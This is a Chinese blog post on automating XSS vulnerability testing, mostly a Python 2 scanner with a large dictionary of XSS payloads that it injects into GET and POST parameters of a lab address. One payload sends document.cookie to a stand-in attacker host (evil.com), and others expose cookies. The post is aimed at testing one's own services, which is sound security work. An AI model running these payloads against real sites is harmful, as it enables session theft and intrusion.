關(guān)于自動(dòng)化xss漏洞盲打

0x01 原因

只要你面試安全開發(fā),妥妥的問的問題就是一些常規(guī)的漏洞檢測(cè)技術(shù),其中xss算是一類吧,而且絕對(duì)問的。每次都會(huì)有人問這個(gè)問題,我也沒次都需要一個(gè)個(gè)解答。剛好想總結(jié)下自己的工作,so,把這塊的一些東西弄出來分享下。

0x02 技術(shù)

XSS的類型在這我就不展開來講,主要講關(guān)于自動(dòng)化測(cè)試的這塊。

  • v1.0 傳統(tǒng)的測(cè)試方式比較簡(jiǎn)單,就是http請(qǐng)求測(cè)試,直接請(qǐng)求url,post的直接將參數(shù)拼接,構(gòu)造payload,然后請(qǐng)求就ok了。這個(gè)版本沒啥可說的,基本上大家都知道。
  • v2.0 的版本是基于ajax的請(qǐng)求,將頁(yè)面完全加載完后,模擬操作執(zhí)行。這個(gè)比較有意思,之前在wooyun上,小伙伴就經(jīng)常問針對(duì)ajax應(yīng)該怎么做。在360的面試?yán)锩?,?dāng)時(shí)那個(gè)負(fù)責(zé)人提供的方法是基于webkit做調(diào)用,但是測(cè)試的結(jié)果是,有一定的概率會(huì)卡住。so,這個(gè)我默認(rèn)放棄。而我選擇用的方式,是基于無瀏覽器的方式來進(jìn)行。相對(duì)來說比較好,在centos的服務(wù)器上,我掛了一個(gè),然后無差別的去測(cè)試自己的業(yè)務(wù),結(jié)果挺理想的。(分享一個(gè)案例代碼,根據(jù)自己的需要,融合到自己的掃描器就好)

0x03 coding

#coding:utf-8
 
import random , requests , copy ,urlparse, urllib , pprint
 
_random=str(random.randint(300,182222))
 
# XSS規(guī)則
XSS_Rule = {
    "script":[
            "<script>alert("+_random+");</script>",
            "<script>alert('XSS');</script>",
            "<script>location.href=\"http://www.evil.com/cookie.php?cookie=\"+escape(document.cookie)</script>",
            "<scr<script>ipt>alert("+_random+");</scr</script>ipt>",
            "<script>alert(String.fromCharCode(88,83,83))</script>",
            "\"><script>alert("+_random+")</script>",
            "</title><script>alert(/"+_random+"/)</script>",
            "</textarea><script>alert(/"+_random+"/)</script>",
            "<? echo('<scr');echo('ipt>alert(\""+_random+"\")</script');?>",
            "<marquee><script>alert('"+_random+"')</script></marquee>",
            "<script language=\"JavaScript\">alert('"+_random+"')</script>",
            "\"><script alert(String.fromCharCode(88,83,83))</script>",
            "\'\">><script>alert('"+_random+"')</script>",
            "<script>var var="+_random+";alert(var)</script>", 
            "<?='<SCRIPT>alert(\""+_random+"\")</SCRIPT>'?>",
            "<scrscriptipt>alert("+_random+")</scrscriptipt>",
            "</script><script>alert("+_random+")</script>",
            "'\"></title><script>alert("+_random+")</script>",
            "</textarea>\'\"><script>alert(document.cookie)</script>",
            "'\"\"><script language=\"JavaScript\">alert('XS');</script>",
            "</script></script><<<<script><>>>><<<script>alert("+_random+")</script>",
            "<html><noalert><noscript>alert("+_random+")</script>",
            "}</style><script>a=eval;a=eval;b=alert;a(b(/"+_random+"/.source));</script>",
            "<SCRIPT>document.write(\""+_random+"\");</SCRIPT>",
            "='><script>alert(\""+_random+"\")</script>",
            "<body background=javascript:'\"><script>alert(navigator.userAgent)</script></body>",
            ">\"><script>alert(/"+_random+"/)</script>",
            "\"></title><script>alert("+_random+")</script>",
            "</div><script>alert("+_random+")</script>",
            "\"></iframe><script>alert("+_random+")</script>",
            "'></select><script>alert("+_random+")</script>",
    ],
    "img":
    [
            "<img src=foo.png onerror=alert(/"+_random+"/) />",
            "<IMG SRC=\"jav&#x09;ascript:alert('"+_random+"');\">",
            "<IMG SRC=\"jav&#x0A;ascript:alert('"+_random+"');\">",
            "<IMG SRC=\"jav&#x0D;ascript:alert('"+_random+"');\">",
            "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
            "<IMG LOWSRC=\"javascript:alert('"+_random+"')\">",
            "<IMG DYNSRC=\"javascript:alert('"+_random+"')\">",
            "<img src=\"javascript:alert('"+_random+"')\">",
            "<IMG SRC='vbscript:msgbox(\""+_random+"\")'>",
            "\"<marquee><img src=k.png onerror=alert(/"+_random+"/) />",
            "\"<marquee><img src=k onerror=alert(/"+_random+"/) />",
            "'\"><marquee><img src=k.png onerror=alert(/"+_random+"/.source) />",
            "<img src=\"javascript:alert(\""+_random+"\")\">",
            ">\"><img src=\"javascript:alert('"+_random+"')\">",
            "\"/></a></><img src=1.gif onerror=alert("+_random+")>",
            "window.alert(\""+_random+"\");",
    ],
    "iframe":
    [
        "<iframe<?php echo chr(11)?>onload=alert('"+_random+"')></iframe>",
        "\"><iframe src='javascript:alert(document.cookie)'></iframe>",
    ],
    "marquee":
    [
        "'>><marquee><h1>"+_random+"</h1></marquee>",
        "\'\">><marquee><h1>"+_random+"</h1></marquee>",
    ],
    "attr-style":
    [
        "<font style='color:expression(alert(document.cookie))'>",
        "<div style=\"x:expression((windows.r==1)?\":eval('r=1;alert(String.fromCharCode(88,83,83));'))\">",
        "<div style=\"background:url('javascript:alert("+_random+")')\">",
        "\" style=\"background:url(javascript:alert(/"+_random+"/))\"",
        "</br style=a:expression(alert())>",
    ],
    "event":
    [
        "<body onunload=\"javascript:alert('"+_random+"');\">",
        "<body onLoad=\"alert('"+_random+"');\">",
        "\" onfous=alert(document.domain)\"><\"",
        "\"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\""+_random+"\")>",
        "<body onLoad=\"while(true) alert('"+_random+"');\">",
        "<SELECT NAME=\"\" onmouseover=alert("+_random+")></select>",
        "'\"></title><font color=red onmouseover=javascript:alert(1337)>"+_random+"</font>",
    ],
    "meta":
    [
        "<META HTTP-EQUIV='refresh' CONTENT='0;url=javascript:alert(/"+_random+"/');\">",
        "<META HTTP-EQUIV='refresh' CONTENT='0;URL=http://;URL=javascript:alert(/"+_random+"/);'>",
    ],
    "base":
    [
        "<BASE HREF=\"javascript:alert('"+_random+"');//\">",
    ],
    "frameset":
    [
        "<FRAMESET><FRAME SRC=\"javascript:alert('"+_random+"');\"></FRAMESET>", 
    ],
    "other":
    [
        "[url=javascript:alert('"+_random+"');]click me[/url]",
        "[color=red' onmouseover=\"alert('"+_random+"')\"]mouse over[/color]",
        "[color=red width=expression(alert("+_random+"))][color]",
    ]
}
 
# 鏈接拼接(針對(duì)get)
def _init_get_url(url_group,rules,check_group):
    for _url_item in url_group:
        url_node = urlparse.urlparse(_url_item)
        uquery = url_node.query
        url_parse = _url_item.replace('?'+uquery, '')
        query_dict = dict(urlparse.parse_qsl(uquery))
 
        for rule_item in rules.keys():
            for _rule in rules[rule_item]:
                for parameter_item in query_dict.keys():
                    tmp_dict = copy.deepcopy(query_dict)
                    tmp_dict[parameter_item] = _rule
                    tmp_qs = urllib.unquote(urllib.urlencode(tmp_dict)).replace('+','%20')
                    check_group.append({'action':url_parse+"?"+tmp_qs,'input':None,'method':'get','regex':_rule})
 
# 請(qǐng)求拼接(post)
def _init_from_url(url_dict,rules,check_group):
    # 遍歷所有的請(qǐng)求
    for url_dict_item in url_dict:
        # 遍歷所有的規(guī)則
        for rule_group in rules.keys():
            input_dict = {}
            for rule_item in rules[rule_group]:
                for input_item in url_dict_item['input']:
                    input_dict.update({input_item:rule_item})
                check_group.append({'action':url_dict_item['action'],'input':input_dict,'method':url_dict_item['method'],'regex':rule_item})
                input_dict = {}
 
# 直接請(qǐng)求
def request_do(url,_data,_regex):
    TIMEOUT=5
    _bool = False
    try:
        if _data is not None:
            req = requests.post(url,data=_data,timeout=TIMEOUT)
        else:
            req = requests.get(url,timeout=TIMEOUT)
        req_result = ''.join(req.content.split('\n'))
        if req_result.find(_regex) != -1:
            _bool = True
    except Exception, e:
        return _bool
    return _bool
 
# 測(cè)試規(guī)則
def xss_check(check_group):
    for target in check_group:
        if target['method'].lower() =='get':
            if request_do(target['action'],None,target['regex']):
                print "[*][GET] Find XSS: %s" % target['action']
        elif target['method'].lower() == 'post':
            if request_do(target['action'],target['input'],target['regex']):
                print "[*][POST] Find XSS: %s,Parameter: (%s)" % (target['action'],str(target['input']))
 
# 拼接請(qǐng)求
def opurl():
    check_group = []
    _init_get_url(['http://10.211.55.7/search/search.php?lang=cn'],XSS_Rule,check_group)
    _init_from_url([{'action':'http://10.211.55.7/b.php','input':['bfname','blname'],'method':'post'}],XSS_Rule,check_group)
    xss_check(check_group)
 
 
 
if __name__ == '__main__':
    opurl()
    # run("http://10.211.55.7/b.php",['bfname','blname'])
    # run("http://10.211.55.7/search/search.php?key=dede&x=24&y=11&lang=cn")
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 本博客轉(zhuǎn)自:「作者:若愚鏈接:https://zhuanlan.zhihu.com/p/22361337來源:知乎...
    韓寶億閱讀 2,935評(píng)論 0 3
  • Android 自定義View的各種姿勢(shì)1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 179,271評(píng)論 25 708
  • 之前積累了XSS 有一段時(shí)間,因?yàn)槟壳伴_始了一件有趣的工程,需要整合非常多的知識(shí),其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,571評(píng)論 0 16
  • 標(biāo)題:Mood Indigo 芳心之歌 原文地址:http://archiveofourown.org/works...
    111避難所閱讀 425評(píng)論 0 0
  • 雨后的薄荷,散發(fā)著的氣息 如此沁人心脾 我是那么在乎那個(gè)竹籃,它是個(gè)好東西 可以裝滿薄荷 可以打一籃空水 也可以裝...
    一言爾閱讀 179評(píng)論 0 0

友情鏈接更多精彩內(nèi)容